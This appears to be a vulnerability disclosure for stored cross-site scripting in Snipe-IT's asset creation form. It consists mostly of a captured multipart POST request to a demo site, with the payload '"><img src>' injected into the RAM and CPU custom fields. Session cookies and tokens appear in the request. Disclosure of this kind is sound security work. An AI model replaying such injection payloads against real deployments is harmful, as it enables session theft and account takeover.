Multiple Stored XSS at ‘_snipeit_ram_3’ and ‘_snipeit_cpu_4’ in the multipart message of POST request when creating a new Asset or editing an existed Asset.
POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=eyJpdiI6IklFZkVHc0JNU04rMzhIWThVdUR1SHc9PSIsInZhbHVlIjoiZlQxOTZXS3NuUGFBZlpKaUNuMGJlS2NuSjdpSm1yNmR3cXdpd3B4VkR5WFo5WlRtVmJoTll2U0JHbDQ1dVRHSlE5NGhnMGRqV3Z1ZTFNVGszUXZIMy9iVHNZQUdJdlhXbmt6OE9BdjdLMVFQMXJZQXVROE1YdTZHZC85MzJZcnhrWG1ya1BKL0pUVXpSS2Jhd0VRMXRvQXpPUkIrVXcvREQvdWwyYWlwQk9VRW1IRzdYcWZTOW1xRVM5RkFmZ0xPQit3QUVYVEpWOXhIa0l2cytmWUZ2a29sdGNxdHFWTGpSYzdGTGNLamQ3aFNiNXRMRlF6VTJBMlpLMEFWV1FCcUxTaW5SakRYc0VYYXRSMEtGNk5NVzRBNkMvV0lSanJoS1lja0lnMFZpbHhqK2NPNW1QckFtczhUcDhMYmd4L1MiLCJtYWMiOiIxYjg1MmQxZWJkOGU2MjU5MzQxZWFhMDNhYmMxMWUzNzJiYjYxOTk4ZmQyNmU1YzZiMWFhNDNiY2EyZTFkNTgyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"
KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"
PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"
8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"
"><img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"
"><img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"
00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"
1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"
user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"
abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS--
"><img src>
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.